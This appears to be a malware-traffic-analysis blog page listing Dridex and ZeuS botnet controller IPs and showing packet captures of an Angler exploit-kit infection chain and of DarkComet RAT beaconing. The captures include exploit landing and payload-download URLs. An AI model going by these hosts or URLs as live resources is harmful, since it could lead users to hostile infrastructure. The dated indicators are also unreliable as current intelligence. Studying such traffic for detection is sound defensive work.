Notice: JavaScript is not enabled. Please Enable JavaScript so Functions Can work correctly.

Malware Traffic Analysis, Traffic Samples and Indicators


THIS WEBSITE IS FOR SALE CLICK HERE TO OWN IT!

Malware Botnet IP Infrastructure Dridex Dyre Dryzea

| | No comments yet | Tags:

Malware Infrastructure Update:

Dridex:

IP = 5.44.216.44

Content = .DOC file

IP = 85.214.196.227

Content = Dridex VNC backconnect server

IP = 223.223.218.37

Content = Dridex VNC backconnect server

 

 

ZeuS – Botnet Controllers

103.19.89.11
103.26.128.8
105.28.97.11
113.29.230.2
124.110.195.16
157.7.170.6
176.97.116.18
177.4.23.15
182.140.221.11
185.113.223.239
185.25.148.240
185.63.255.15
185.79.118.7
186.233.114.7
188.241.140.222
188.241.140.224
188.241.14.11
193.146.210.6
193.189.117.5
202.144.144.19
209.164.84.7
213.183.56.18
213.238.170.5
220.202.15.10
41.71.177.224
60.241.184.209
63.249.152.7
64.182.215.6
64.182.6.6
83.212.117.233
91.196.49.6
91.201.215.4
91.237.198.3

 

Angler Exploit Kit EK Silverlight Vulnerability Vector PCAP Converted Traffic Sample

| | No comments yet | Tags:

2014-05-23 00:11:15.678281 IP 192.168.204.194.56962 > 192.168.204.2.53: 9876+ A? www.lordsroofing.co[.]uk. (40)
E..D……………….5.0..&…………www.lordsroofing.co[.]uk…..
2014-05-23 00:11:16.667729 IP 192.168.204.194.56962 > 192.168.204.2.53: 9876+ A? www.lordsroofing.co[.]uk. (40)
E..D……………….5.0..&…………www.lordsroofing.co[.]uk…..
2014-05-23 00:11:16.835288 IP 192.168.204.2.53 > 192.168.204.194.56962: 9876 2/0/0 CNAME lordsroofing.co[.]uk., A 81.169.145.157 (70)
E..bf…………….5…N\q&…………www.lordsroofing.co[.]uk………………………….Q…
2014-05-23 00:11:16.835909 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [S], seq 3445627289, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….M….Q….Y.P.`…….. .6……………
2014-05-23 00:11:16.836136 IP 192.168.204.194.49242 > 81.169.145.157.80: Flags [S], seq 1743890570, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….L….Q….Z.Pg……… ..8…………..
2014-05-23 00:11:16.981833 IP 81.169.145.157.80 > 192.168.204.194.49241: Flags [S.], seq 709316016, ack 3445627290, win 64240, options [mss 1460], length 0
E..,f…..c.Q……..P.Y*GM..`..`………….
2014-05-23 00:11:16.981987 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [.], ack 1, win 64240, length 0
E..(..@….W….Q….Y.P.`..*GM.P…$………
2014-05-23 00:11:16.982677 IP 192.168.204.194.49241 > 81.169.145.157.80: Flags [P.], seq 1:412, ack 1, win 64240, length 411
E…..@………Q….Y.P.`..*GM.P….]..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bing[.]com/search?q=lordsroofing.co[.]uk&qs=n&form=QBRE&pq=lordsroofing.co[.]uk&sc=1-18&sp=-1&sk=&cvid=6f52be04c25246ca9c6fde50f16b7a5b
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: www.lordsroofing.co[.]uk
Connection: Keep-Alive
2014-05-23 00:11:18.726680 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 1:308, ack 1, win 64240, length 307
E..[.U@…0…..[….c.P…n(“9.P…ct..GET /q304txnj5o HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.lordsroofing.co[.]uk/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: dgw.tumijilpwq[.]net
Connection: Keep-Alive
2014-05-23 00:11:18.726684 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 308, win 64240, length 0
E..(i…….[……..P.c(“9…..P….D……..
2014-05-23 00:11:19.100357 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 1:1461, ack 308, win 64240, length 1460
E…jC….
+[……..P.c(“9…..P….>..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip
2014-05-23 00:11:20.384208 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 308:578, ack 44005, win 64240, length 270
E..6..@…0’….[….c.P….(“..P…….GET /yVS75Oi1uFuUZw4pDl8FmO4AGwl5KtSaBYuueoeFyVc9CNZukDbhePX9-TvC6y5Z5viR-A== HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: dgw.tumijilpwq[.]net
Connection: Keep-Alive
2014-05-23 00:11:20.384223 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 578, win 64240, length 0
E..(j……j[……..P.c(“……P….Q……..
2014-05-23 00:11:20.694812 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 44005:45465, ack 578, win 64240, length 1460
E…j….. .[……..P.c(“……P…K…HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache
Content-Encoding: gzip

 

—————————- MALWARE PAYLOAD GET REQUEST ———————————————

 
2014-05-23 00:11:21.643869 IP 192.168.204.194.49251 > 91.185.215.137.80: Flags [P.], seq 578:719, ack 96863, win 64240, length 141
E… .@…0…..[….c.P….(#..P…E ..GET /cVlzz_TT74aGPbC1Ot-xPe27DP9ANcEfzYolZK03kJA1aNUBxfQoDNvuq0S8ImOsw8YkJw== HTTP/1.1
Host: dgw.tumijilpwq[.]net
Cache-Control: no-cache
2014-05-23 00:11:21.643917 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [.], ack 719, win 64240, length 0
E..(j……B[……..P.c(#…..<P…)J……..
2014-05-23 00:11:22.101656 IP 91.185.215.137.80 > 192.168.204.194.49251: Flags [P.], seq 96863:98323, ack 719, win 64240, length 1460
E…j….. .[……..P.c(#…..<P…….HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 23 May 2014 04:11:18 GMT
Content-Type: application/octet-stream
Content-Length: 134152
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 26 Jul 2040 05:00:00 GMT
Pragma: no-cache

,6.omjfgeldo..fg.ldonjfg!ldonjfgaldonjfgaldonjfgaldonjfgaldo.jfgos.an.o.@.e#.K2…D…….D……L.
N.. A.

Is the DarkComet RAT group even supporting it anymore?

| | No comments yet | Tags:

I found the RAT on one of my Local Windows Machines – Forgot to sandbox the samples I was playing with but I do believe DarkComet RAT is not being maintained anymore unless someone can confirm otherwise?

Don’t let the traffic fool you, the reason my box is only sending SYN packets to the hostile infrastructure is because I blocked their known hostile IPs at my uplink so I can study it without risking PII or banking information or even remote access to my workstation.

 

 

2015-05-19 22:31:03.730224 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Wd@…W….e…….i
.u………v……………
2015-05-19 22:31:09.733831 IP 192.168.1.101.41347 > 193.0.200.131.35689: Flags [S], seq 179598799, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Wl@…W….e…….i
.u…..p……………
2015-05-19 22:31:23.725572 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-05-19 22:31:26.725388 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W.@…W….e…….i.#hm……………………
2015-05-19 22:31:32.725971 IP 192.168.1.101.41348 > 193.0.200.131.35689: Flags [S], seq 2518902893, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0W.@…W….e…….i.#hm….p……………
2015-05-19 22:31:46.729820 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…W!…e…….i………….E…………..
2015-05-19 22:31:49.729546 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X”@…W….e…….i………….E…………..
2015-05-19 22:31:55.730140 IP 192.168.1.101.41358 > 193.0.200.131.35689: Flags [S], seq 4171882909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0X?@…V….e…….i……..p…0N……….
2015-05-19 22:32:09.736312 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X_@…V….e…….i.#……….o……………
2015-05-19 22:32:12.727663 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Xc@…V….e…….i.#……….o……………
2015-05-19 22:32:18.729255 IP 192.168.1.101.41359 > 193.0.200.131.35689: Flags [S], seq 2284060342, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Xv@…V….e…….i.#……p……………
2015-05-19 22:32:32.731983 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-05-19 22:32:35.731848 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4X.@…V….e…….iu.WE……..)……………
2015-05-19 22:32:41.735398 IP 192.168.1.101.41360 > 193.0.200.131.35689: Flags [S], seq 1973507909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0[%@…T….e…….iu.WE….p…=………..
2015-05-19 22:32:55.736266 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QQ…e…….i.f………..R…………..
2015-05-19 22:32:58.736953 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QK…e…….i.f………..R…………..
2015-05-19 22:33:04.737554 IP 192.168.1.101.41372 > 193.0.200.131.35689: Flags [S], seq 3110503877, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0^^@…P….e…….i.f……p….[……….
2015-05-19 22:33:18.739418 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4_q@…O….e…….i.O.b……………………
2015-05-19 22:33:21.740131 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4`.@…Nn…e…….i.O.b……………………
2015-05-19 22:33:27.737710 IP 192.168.1.101.41373 > 193.0.200.131.35689: Flags [S], seq 2656021602, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0a+@…N….e…….i.O.b….p……………
2015-05-19 22:33:41.735637 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4a.@…ML…e…….iB..(……………………
2015-05-19 22:33:44.735278 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4a.@…MH…e…….iB..(……………………
2015-05-19 22:33:50.735813 IP 192.168.1.101.41374 > 193.0.200.131.35689: Flags [S], seq 1117003048, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b @…M-…e…….iB..(….p……………
2015-05-19 22:34:04.737556 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…M….e…….il1r…………………….
2015-05-19 22:34:07.737441 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…M….e…….il1r…………………….
2015-05-19 22:34:13.741992 IP 192.168.1.101.41375 > 193.0.200.131.35689: Flags [S], seq 1815179909, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b(@…M….e…….il1r…..p…+………..
2015-05-19 22:34:27.738715 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bC@…L….e…….i……………………….
2015-05-19 22:34:30.738558 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bH@…L….e…….i……………………….
2015-05-19 22:34:36.739128 IP 192.168.1.101.41376 > 193.0.200.131.35689: Flags [S], seq 447940370, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0bT@…L….e…….i……..p……………
2015-05-19 22:34:50.741967 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4bb@…L….e…….i/………………………
2015-05-19 22:34:53.742745 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4be@…L….e…….i/………………………
2015-05-19 22:34:59.743312 IP 192.168.1.101.41377 > 193.0.200.131.35689: Flags [S], seq 802479073, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0bo@…L….e…….i/…….p……………
2015-05-19 22:35:13.746161 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….i…L……..g……………
2015-05-19 22:35:16.755848 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….i…L……..g……………
2015-05-19 22:35:22.746428 IP 192.168.1.101.41378 > 193.0.200.131.35689: Flags [S], seq 4286877516, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…L….e…….i…L….p…{………..
2015-05-19 22:35:36.756173 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….iVfe………:f…………..
2015-05-19 22:35:39.757038 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L….e…….iVfe………:f…………..
2015-05-19 22:35:45.748575 IP 192.168.1.101.41379 > 193.0.200.131.35689: Flags [S], seq 1449551275, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…Lp…e…….iVfe…..p…No……….
2015-05-19 22:35:59.751368 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…LZ…e…….i..a…………………….
2015-05-19 22:36:02.751155 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…LP…e…….i..a…………………….
2015-05-19 22:36:08.751719 IP 192.168.1.101.41381 > 193.0.200.131.35689: Flags [S], seq 247554514, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b.@…LO…e…….i..a…..p……………
2015-05-19 22:36:22.753536 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4b.@…L:…e…….i………….7…………..
2015-05-19 22:36:25.752318 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4fc@…H….e…….i………….7…………..
2015-05-19 22:36:31.758856 IP 192.168.1.101.41382 > 193.0.200.131.35689: Flags [S], seq 2181989678, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0h_@…F….e…….i……..p….A……….
2015-05-19 22:36:45.755730 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…DX…e…….i..#………*E…………..
2015-05-19 22:36:48.755442 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4l(@…C
…e…….i..#………*E…………..
2015-05-19 22:36:54.757029 IP 192.168.1.101.41391 > 193.0.200.131.35689: Flags [S], seq 2836538132, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0l.@…B….e…….i..#…..p…>N……….
2015-05-19 22:37:08.759753 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4p!@…?….e…….i..W…………………….
2015-05-19 22:37:11.759597 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4p.@…>….e…….i..W…………………….
2015-05-19 22:37:17.755178 IP 192.168.1.101.41392 > 193.0.200.131.35689: Flags [S], seq 3720042478, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0q.@…=….e…….i..W…..p……………
2015-05-19 22:37:31.755905 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…9….e…….i._……….PR…………..
2015-05-19 22:37:34.761769 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4u.@…9….e…….i._……….PR…………..
2015-05-19 22:37:40.755289 IP 192.168.1.101.41394 > 193.0.200.131.35689: Flags [S], seq 2992632758, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0w.@…7….e…….i._……p…d[……….
2015-05-19 22:37:54.764038 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6….e…….i.$……….uQ…………..
2015-05-19 22:37:57.764905 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6….e…….i.$……….uQ…………..
2015-05-19 22:38:03.767457 IP 192.168.1.101.41396 > 193.0.200.131.35689: Flags [S], seq 2904871920, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0x.@…6z…e…….i.$……p….Z……….
2015-05-19 22:38:17.770226 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6i…e…….i’………………………
2015-05-19 22:38:20.770088 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4x.@…6_…e…….i’………………………
2015-05-19 22:38:26.770624 IP 192.168.1.101.41397 > 193.0.200.131.35689: Flags [S], seq 668794275, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…6….e…….i’…….p……………
2015-05-19 22:38:40.772380 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y%@…6….e…….i.@b……….=…………..
2015-05-19 22:38:43.772209 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y+@…6….e…….i.@b……….=…………..
2015-05-19 22:38:49.772752 IP 192.168.1.101.41402 > 193.0.200.131.35689: Flags [S], seq 3225445090, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y5@…6….e…….i.@b…..p….F……….
2015-05-19 22:39:03.774532 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yH@…5….e…….i?.$…………………….
2015-05-19 22:39:06.775353 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yJ@…5….e…….i?.$…………………….
2015-05-19 22:39:12.767912 IP 192.168.1.101.41403 > 193.0.200.131.35689: Flags [S], seq 1058743468, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0yO@…5….e…….i?.$…..p……………
2015-05-19 22:39:26.771621 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yq@…5….e…….i.!………..e…………..
2015-05-19 22:39:29.771561 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4yw@…5….e…….i.!………..e…………..
2015-05-19 22:39:35.772091 IP 192.168.1.101.41404 > 193.0.200.131.35689: Flags [S], seq 2149709015, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5….e…….i.!……p….n……….
2015-05-19 22:39:49.769973 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5….e…….i]!.E……………………
2015-05-19 22:39:52.769701 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5….e…….i]!.E……………………
2015-05-19 22:39:58.770210 IP 192.168.1.101.41405 > 193.0.200.131.35689: Flags [S], seq 1562498373, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5….e…….i]!.E….p……………
2015-05-19 22:40:12.772001 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5{…e…….i..r2……………………
2015-05-19 22:40:15.771784 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5u…e…….i..r2……………………
2015-05-19 22:40:21.772368 IP 192.168.1.101.41406 > 193.0.200.131.35689: Flags [S], seq 3692589618, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5s…e…….i..r2….p……………
2015-05-19 22:40:35.780272 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5G…e…….i…k………?…………..
2015-05-19 22:40:38.779938 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4y.@…5E…e…….i…k………?…………..
2015-05-19 22:40:44.780498 IP 192.168.1.101.41407 > 193.0.200.131.35689: Flags [S], seq 783358059, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0y.@…5A…e…….i…k….p….H……….
2015-05-19 22:40:58.782202 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4z.@…5….e…….iy)……….k*…………..
2015-05-19 22:41:01.773078 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4z.@…5….e…….iy)……….k*…………..
2015-05-19 22:41:07.774640 IP 192.168.1.101.41408 > 193.0.200.131.35689: Flags [S], seq 2032734727, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0z @…5….e…….iy)……p….3……….
2015-05-19 22:41:21.777441 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4{.@…4*…e…….i..x…………………….
2015-05-19 22:41:24.779244 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}@@…1….e…….i..x…………………….
2015-05-19 22:41:30.780781 IP 192.168.1.101.41421 > 193.0.200.131.35689: Flags [S], seq 4003494073, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0}h@…1….e…….i..x…..p……………
2015-05-19 22:41:44.784349 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}.@…1….e…….i.? 2……………………
2015-05-19 22:41:47.776434 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4}.@…1….e…….i.? 2……………………
2015-05-19 22:41:53.776949 IP 192.168.1.101.41429 > 193.0.200.131.35689: Flags [S], seq 205457714, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0}.@…1_…e…….i.? 2….p……………
2015-05-19 22:42:07.779704 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.`/…………………….
2015-05-19 22:42:10.781523 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….{…e…….i.`/…………………….
2015-05-19 22:42:16.783094 IP 192.168.1.101.41434 > 193.0.200.131.35689: Flags [S], seq 3261083592, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i.`/…..p….!……….
2015-05-19 22:42:30.781824 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i. ……….X9…………..
2015-05-19 22:42:33.781692 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i. ……….X9…………..
2015-05-19 22:42:39.784246 IP 192.168.1.101.41435 > 193.0.200.131.35689: Flags [S], seq 2569012454, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i. ……p…lB……….
2015-05-19 22:42:53.786088 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.zJ…………………….
2015-05-19 22:42:56.785842 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.zJ…………………….
2015-05-19 22:43:02.786380 IP 192.168.1.101.41436 > 193.0.200.131.35689: Flags [S], seq 4101655066, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i.zJ…..p……………
2015-05-19 22:43:16.788265 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….m…e…….i…j……..w……………
2015-05-19 22:43:19.787991 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….k…e…….i…j……..w……………
2015-05-19 22:43:25.788551 IP 192.168.1.101.41437 > 193.0.200.131.35689: Flags [S], seq 2632900970, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….i…e…….i…j….p……………
2015-05-19 22:43:39.785318 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….D…e…….ie.6………Y……………
